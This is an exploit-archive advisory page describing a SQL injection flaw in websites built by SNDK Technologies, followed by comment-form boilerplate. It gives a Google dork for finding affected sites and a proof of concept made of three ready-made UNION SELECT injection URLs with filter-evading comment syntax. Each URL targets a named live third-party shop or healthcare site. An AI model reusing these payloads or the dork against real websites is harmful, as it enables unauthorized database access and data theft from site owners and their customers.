SNDK Technologies - Sql Injection Vulnerability

2023.08.12

behrouz mansoori (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: "Designed by SNDK Technologies Pvt. Ltd."

*********************************************************
#Exploit Title: SNDK Technologies - Sql Injection Vulnerability
#Date: 2023-08-12
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed by SNDK Technologies Pvt. Ltd."
#Category:webapps
#Tested On: Mac, Firefox
Proof of Concept:
### Demo :
https://www.thecottonish.com/shop.php?id=-13%27%20/*!12345union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+
https://silverjewelryandgems.com/shop.php?id=-1273%27%20/*!12345union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+
https://www.vetoxhealthcare.com/category.php?id=-4%27%20/*!12345union*/%20select%201,2,3,version(),5,6,7,8,9,10--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SNDK Technologies - Sql Injection Vulnerability

Dork: "Designed by SNDK Technologies Pvt. Ltd."

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.